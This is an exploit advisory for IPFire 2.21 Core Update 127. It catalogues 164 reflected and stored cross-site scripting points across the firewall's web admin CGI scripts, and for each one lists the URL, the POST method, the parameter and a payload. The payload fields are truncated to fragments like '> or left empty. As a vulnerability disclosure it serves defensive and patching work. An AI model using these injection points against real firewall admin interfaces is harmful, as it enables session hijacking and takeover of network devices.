################################################################################################################################## # Exploit Title: IPFire 2.21 - Core Update 127 | Cross-Site Scripting # Date: 08.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.ipfire.org # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso # Version: IPFire 2.21 - Core Update 127 ################################################################################################################################## Introduction IPFire is a Linux distribution that focusses on easy setup, good handling and high level of security. It is operated via an intuitive web-based interface which offers many configuration options for beginning and experienced system administrators. IPFire is maintained by developers who are concerned about security and who update the product regularly to keep it secure. IPFire ships with a custom package manager called Pakfire and the system can be expanded with various add-ons. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_mailsender PAYLOAD '"> ################################################################################# XSS2 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_recipient PAYLOAD '> ################################################################################# XSS3 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_mailserver PAYLOAD '> ################################################################################# XSS4 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_mailport PAYLOAD '> ################################################################################# XSS5 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_mailuser PAYLOAD '> ################################################################################# XSS6 | Reflected URL https://192.168.2.200:444/cgi-bin/mail.cgi METHOD Post PARAMETER txt_mailpass PAYLOAD '> ################################################################################# XSS7 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER PROXY_PORT PAYLOAD '> ################################################################################# XSS8 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER TRANSPARENT_PORT PAYLOAD '> ################################################################################# XSS9 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER UPSTREAM_PROXY PAYLOAD '> ################################################################################# XSS10 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER UPSTREAM_USER PAYLOAD '> ################################################################################# XSS11 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER UPSTREAM_PASSWORD PAYLOAD '> ################################################################################# XSS12 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER FILEDESCRIPTORS PAYLOAD '> ################################################################################# XSS13 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER CACHE_MEM PAYLOAD '> ################################################################################# XSS14 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER CACHE_SIZE PAYLOAD '> ################################################################################# XSS15 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER MIN_SIZE PAYLOAD '> ################################################################################# XSS16 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER MAX_SIZE PAYLOAD '> ################################################################################# XSS17 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER MAX_INCOMING_SIZE PAYLOAD '> ################################################################################# XSS18 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER MAX_OUTGOING_SIZE PAYLOAD '> ################################################################################# XSS19 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER AUTH_CHILDREN PAYLOAD '> ################################################################################# XSS20 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER AUTH_CACHE_TTL PAYLOAD '> ################################################################################# XSS21 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER AUTH_ALWAYS_REQUIRED PAYLOAD '> ################################################################################# XSS22 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER DST_NOAUTH PAYLOAD '> ################################################################################# XSS23 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER NCSA_MIN_PASS_LEN PAYLOAD '> ################################################################################# XSS24 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER NCSA_BYPASS_REDIR PAYLOAD '> ################################################################################# XSS25 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_REQUIRED PAYLOAD '> ################################################################################# XSS26 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_TIMEOUT PAYLOAD '> ################################################################################# XSS27 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_HOSTS PAYLOAD '> ################################################################################# XSS28 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_ENABLE_ACL PAYLOAD '> ################################################################################# XSS29 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_USER_ACL PAYLOAD '> ################################################################################# XSS30 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_ALLOW_USERS PAYLOAD '> ################################################################################# XSS31 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER IDENT_DENY_USERS PAYLOAD '> ################################################################################# XSS32 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER LDAP_TYPE PAYLOAD '> ################################################################################# XSS33 | Reflected URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER LDAP_PORT PAYLOAD '> ################################################################################# XSS34 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER RADIUS_PORT PAYLOAD '> ################################################################################# XSS35 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER RADIUS_ENABLE_ACL PAYLOAD '> ################################################################################# XSS36 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER RADIUS_USER_ACL PAYLOAD '> ################################################################################# XSS37 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER RADIUS_ALLOW_USERS PAYLOAD '> ################################################################################# XSS38 | Stored URL https://192.168.2.200:444/cgi-bin/proxy.cgi METHOD Post PARAMETER RADIUS_DENY_USERS PAYLOAD '> ################################################################################# XSS39 | Stored URL https://192.168.2.200:444/cgi-bin/urlfilter.cgi METHOD Post PARAMETER REDIRECT_PAGE PAYLOAD '> ################################################################################# XSS40 | Reflected URL https://192.168.2.200:444/cgi-bin/urlfilter.cgi METHOD Post PARAMETER BE_BLACKLIST PAYLOAD '> ################################################################################# XSS41 | Reflected URL https://192.168.2.200:444/cgi-bin/updatexlrator.cgi METHOD Post PARAMETER MAX_DISK_USAGE PAYLOAD '> ################################################################################# XSS42 | Reflected URL https://192.168.2.200:444/cgi-bin/updatexlrator.cgi METHOD Post PARAMETER MAX_DOWNLOAD_RATE PAYLOAD '> ################################################################################# XSS43 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER START_ADDR_GREEN PAYLOAD '> ################################################################################# XSS44 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER END_ADDR_GREEN PAYLOAD '> ################################################################################# XSS45 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER DEFAULT_LEASE_TIME_GREEN PAYLOAD '> ################################################################################# XSS46 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER MAX_LEASE_TIME_GREEN PAYLOAD '> ################################################################################# XSS47 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER DOMAIN_NAME_GREEN PAYLOAD '> ################################################################################# XSS48 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER DNS1_GREEN PAYLOAD '> ################################################################################# XSS49 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER DNS2_GREEN PAYLOAD '> ################################################################################# XSS50 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER NTP1_GREEN PAYLOAD '> ################################################################################# XSS51 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER NTP2_GREEN PAYLOAD '> ################################################################################# XSS52 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER WINS1_GREEN PAYLOAD '> ################################################################################# XSS53 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER WINS2_GREEN PAYLOAD '> ################################################################################# XSS54 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER NEXT_GREEN PAYLOAD '> ################################################################################# XSS55 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FILE_GREEN PAYLOAD '> ################################################################################# XSS56 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER ADVOPT_DATA PAYLOAD '> ################################################################################# XSS57 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER KEY1 PAYLOAD '> ################################################################################# XSS58 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_MAC PAYLOAD '> ################################################################################# XSS59 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_ADDR PAYLOAD '> ################################################################################# XSS60 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_REMARK PAYLOAD '> ################################################################################# XSS61 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_NEXTADDR PAYLOAD '> ################################################################################# XSS62 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_FILENAME PAYLOAD '> ################################################################################# XSS63 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER FIX_ROOTPATH PAYLOAD '> ################################################################################# XSS64 | Reflected URL https://192.168.2.200:444/cgi-bin/dhcp.cgi METHOD Post PARAMETER KEY2 PAYLOAD '> ################################################################################# XSS65 | Reflected URL https://192.168.2.200:444/cgi-bin/captive.cgi METHOD Post PARAMETER TITLE PAYLOAD "> ################################################################################# XSS66 | Reflected URL https://192.168.2.200:444/cgi-bin/captive.cgi METHOD Post PARAMETER COLOR PAYLOAD "> ################################################################################# XSS67 | Stored URL https://192.168.2.200:444/cgi-bin/connscheduler.cgi METHOD Post PARAMETER ACTION_HOUR PAYLOAD ################################################################################# XSS68 | Stored URL https://192.168.2.200:444/cgi-bin/connscheduler.cgi METHOD Post PARAMETER ACTION_MINUTE PAYLOAD ################################################################################# XSS69 | Stored URL https://192.168.2.200:444/cgi-bin/connscheduler.cgi METHOD Post PARAMETER ACTION_DAYSTART PAYLOAD ################################################################################# XSS70 | Stored URL https://192.168.2.200:444/cgi-bin/connscheduler.cgi METHOD Post PARAMETER ACTION_DAYEND PAYLOAD ################################################################################# XSS71 | Reflected URL https://192.168.2.200:444/cgi-bin/hosts.cgi METHOD Post PARAMETER KEY1 PAYLOAD '> ################################################################################# XSS72 | Reflected URL https://192.168.2.200:444/cgi-bin/hosts.cgi METHOD Post PARAMETER IP PAYLOAD '> ################################################################################# XSS73 | Reflected URL https://192.168.2.200:444/cgi-bin/hosts.cgi METHOD Post PARAMETER HOST PAYLOAD '> ################################################################################# XSS74 | Reflected URL https://192.168.2.200:444/cgi-bin/hosts.cgi METHOD Post PARAMETER DOM PAYLOAD '> ################################################################################# XSS75 | Reflected URL https://192.168.2.200:444/cgi-bin/dns.cgi METHOD Post PARAMETER DNS0 PAYLOAD "> ################################################################################# XSS76 | Reflected URL https://192.168.2.200:444/cgi-bin/dns.cgi METHOD Post PARAMETER DNS1 PAYLOAD "> ################################################################################# XSS77 | Reflected URL https://192.168.2.200:444/cgi-bin/dnsforward.cgi METHOD Post PARAMETER ZONE PAYLOAD "> ################################################################################# XSS78 | Reflected URL https://192.168.2.200:444/cgi-bin/dnsforward.cgi METHOD Post PARAMETER FORWARD_SERVERS PAYLOAD '> ################################################################################# XSS79 | Reflected URL https://192.168.2.200:444/cgi-bin/routing.cgi METHOD Post PARAMETER KEY1 PAYLOAD '> ################################################################################# XSS80 | Reflected URL https://192.168.2.200:444/cgi-bin/routing.cgi METHOD Post PARAMETER GATEWAY PAYLOAD '> ################################################################################# XSS81 | Reflected URL https://192.168.2.200:444/cgi-bin/routing.cgi METHOD Post PARAMETER REMARK PAYLOAD '> ################################################################################# XSS82 | Reflected URL https://192.168.2.200:444/cgi-bin/mac.cgi METHOD Post PARAMETER MAC PAYLOAD '> ################################################################################# XSS83 | Reflected URL https://192.168.2.200:444/cgi-bin/mac.cgi METHOD Post PARAMETER MAC1 PAYLOAD '> ################################################################################# XSS84 | Reflected URL https://192.168.2.200:444/cgi-bin/mac.cgi METHOD Post PARAMETER MAC2 PAYLOAD '> ################################################################################# XSS85 | Reflected URL https://192.168.2.200:444/cgi-bin/wakeonlan.cgi METHOD Post PARAMETER CLIENT_MAC PAYLOAD '> ################################################################################# XSS86 | Reflected URL https://192.168.2.200:444/cgi-bin/wakeonlan.cgi METHOD Post PARAMETER CLIENT_COMMENT PAYLOAD '> ################################################################################# XSS87 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER TYPE PAYLOAD '> ################################################################################# XSS88 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER IKE_VERSION PAYLOAD '> ################################################################################# XSS89 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER IKE_ENCRYPTION PAYLOAD '> ################################################################################# XSS90 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER IKE_INTEGRITY PAYLOAD '> ################################################################################# XSS91 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER IKE_GROUPTYPE PAYLOAD '> ################################################################################# XSS92 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER IKE_LIFETIME PAYLOAD '> ################################################################################# XSS93 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ESP_ENCRYPTION PAYLOAD '> ################################################################################# XSS94 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ESP_INTEGRITY PAYLOAD '> ################################################################################# XSS95 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ESP_GROUPTYPE PAYLOAD '"> ################################################################################# XSS96 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ESP_KEYLIFE PAYLOAD '> ################################################################################# XSS97 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER COMPRESSION PAYLOAD '> ################################################################################# XSS98 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ONLY_PROPOSED PAYLOAD '> ################################################################################# XSS99 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER PFS PAYLOAD '> ################################################################################# XSS100 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER DPD_ACTION PAYLOAD '> ################################################################################# XSS101 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER DPD_DELAY PAYLOAD '> ################################################################################# XSS102 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER DPD_TIMEOUT PAYLOAD '> ################################################################################# XSS103 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER FORCE_MOBIKE PAYLOAD '> ################################################################################# XSS104 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER NAME PAYLOAD '> ################################################################################# XSS105 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER LOCAL_SUBNET PAYLOAD '> ################################################################################# XSS106 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER REMOTE PAYLOAD '> ################################################################################# XSS107 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER LOCAL_ID PAYLOAD '> ################################################################################# XSS108 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER REMOTE_ID PAYLOAD '> ################################################################################# XSS109 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER PSK PAYLOAD '> ################################################################################# XSS110 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_ORGANIZATION PAYLOAD '> ################################################################################# XSS111 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_HOSTNAME PAYLOAD '> ################################################################################# XSS112 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_EMAIL PAYLOAD '> ################################################################################# XSS113 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_OU PAYLOAD '> ################################################################################# XSS114 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_CITY PAYLOAD '> ################################################################################# XSS115 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER ROOTCERT_STATE PAYLOAD '> ################################################################################# XSS116 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER SUBJECTALTNAME PAYLOAD '> ################################################################################# XSS117 | Reflected URL https://192.168.2.200:444/cgi-bin/vpnmain.cgi METHOD Post PARAMETER P12_PASS PAYLOAD '> ################################################################################# XSS118 | Stored URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER VPN_IP PAYLOAD '> ################################################################################# XSS119 | Stored URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER DMTU PAYLOAD '> ################################################################################# XSS120 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER ccdname PAYLOAD '> ################################################################################# XSS121 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER ccdsubnet PAYLOAD '> ################################################################################# XSS122 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER DOVPN_SUBNET PAYLOAD '> ################################################################################# XSS123 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER DHCP_DOMAIN PAYLOAD '> ################################################################################# XSS124 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER DHCP_DNS PAYLOAD '> ################################################################################# XSS125 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER DHCP_WINS PAYLOAD '> ################################################################################# XSS126 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER ROUTES_PUSH PAYLOAD '> ################################################################################# XSS127 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER FRAGMENT PAYLOAD '> ################################################################################# XSS128 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER KEEPALIVE_1 PAYLOAD '> ################################################################################# XSS129 | Reflected URL https://192.168.2.200:444/cgi-bin/ovpnmain.cgi METHOD Post PARAMETER KEEPALIVE_2 PAYLOAD '> ################################################################################# XSS130 | Reflected URL https://192.168.2.200:444/cgi-bin/ddns.cgi METHOD Post PARAMETER ID PAYLOAD '> ################################################################################# XSS131 | Reflected URL https://192.168.2.200:444/cgi-bin/ddns.cgi METHOD Post PARAMETER HOSTNAME PAYLOAD '> ################################################################################# XSS132 | Reflected URL https://192.168.2.200:444/cgi-bin/ddns.cgi METHOD Post PARAMETER LOGIN PAYLOAD '> ################################################################################# XSS133 | Reflected URL https://192.168.2.200:444/cgi-bin/ddns.cgi METHOD Post PARAMETER PASSWORD PAYLOAD '> ################################################################################# XSS134 | Stored URL https://192.168.2.200:444/cgi-bin/time.cgi METHOD Post PARAMETER NTP_ADDR_1 PAYLOAD '> ################################################################################# XSS135 | Stored URL https://192.168.2.200:444/cgi-bin/time.cgi METHOD Post PARAMETER NTP_ADDR_2 PAYLOAD '> ################################################################################# XSS136 | Stored URL https://192.168.2.200:444/cgi-bin/time.cgi METHOD Post PARAMETER UPDATE_VALUE PAYLOAD '> ################################################################################# XSS137 | Reflected URL https://192.168.2.200:444/cgi-bin/ids.cgi METHOD Post PARAMETER OINKCODE PAYLOAD '> ################################################################################# XSS138 | Stored URL https://192.168.2.200:444/cgi-bin/extrahd.cgi METHOD Post PARAMETER FS PAYLOAD '> ################################################################################# XSS139 | Stored URL https://192.168.2.200:444/cgi-bin/extrahd.cgi METHOD Post PARAMETER PATH PAYLOAD '> ################################################################################# XSS140 | Stored URL https://192.168.2.200:444/cgi-bin/extrahd.cgi METHOD Post PARAMETER UUID PAYLOAD '> ################################################################################# XSS141 | Reflected URL https://192.168.2.200:444/cgi-bin/firewall.cgi METHOD Post PARAMETER src_addr PAYLOAD '> ################################################################################# XSS142 | Reflected URL https://192.168.2.200:444/cgi-bin/firewall.cgi METHOD Post PARAMETER tgt_addr PAYLOAD '> ################################################################################# XSS143 | Reflected URL https://192.168.2.200:444/cgi-bin/firewall.cgi METHOD Post PARAMETER SRC_PORT PAYLOAD '> ################################################################################# XSS144 | Reflected URL https://192.168.2.200:444/cgi-bin/firewall.cgi METHOD Post PARAMETER TGT_PORT PAYLOAD '"> ################################################################################# XSS145 | Reflected URL https://192.168.2.200:444/cgi-bin/firewall.cgi METHOD Post PARAMETER ruleremark PAYLOAD '> ################################################################################# XSS146 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER HOSTNAME PAYLOAD '> ################################################################################# XSS147 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER IP PAYLOAD '> ################################################################################# XSS148 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER SUBNET PAYLOAD '> ################################################################################# XSS149 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER NETREMARK PAYLOAD '> ################################################################################# XSS150 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER HOSTREMARK PAYLOAD '> ################################################################################# XSS151 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER newhost PAYLOAD '> ################################################################################# XSS152 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER grp_name PAYLOAD '> ################################################################################# XSS153 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER remark PAYLOAD '> ################################################################################# XSS154 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER SRV_NAME PAYLOAD '> ################################################################################# XSS155 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER SRV_PORT PAYLOAD '> ################################################################################# XSS156 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER SRVGRP_NAME PAYLOAD '> ################################################################################# XSS157 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER SRVGRP_REMARK PAYLOAD '> ################################################################################# XSS158 | Reflected URL https://192.168.2.200:444/cgi-bin/fwhosts.cgi METHOD Post PARAMETER updatesrvgrp PAYLOAD '> ################################################################################# XSS159 | Stored URL https://192.168.2.200:444/cgi-bin/logs.cgi/config.dat METHOD Post PARAMETER ENABLE_REMOTELOG PAYLOAD '> ################################################################################# XSS160 | Reflected URL https://192.168.2.200:444/cgi-bin/logs.cgi/proxylog.dat METHOD Post PARAMETER FILTER PAYLOAD '> ################################################################################# XSS161 | Reflected URL https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogip.dat METHOD Post PARAMETER pienumber PAYLOAD '> ################################################################################# XSS162 | Reflected URL https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogport.dat METHOD Post PARAMETER pienumber PAYLOAD '> ################################################################################# XSS163 | Reflected URL https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogcountry.dat METHOD Post PARAMETER pienumber PAYLOAD '> ################################################################################# XSS164 | Reflected URL https://192.168.2.200:444/cgi-bin/logs.cgi/log.dat METHOD Post PARAMETER SECTION PAYLOAD '> #################################################################################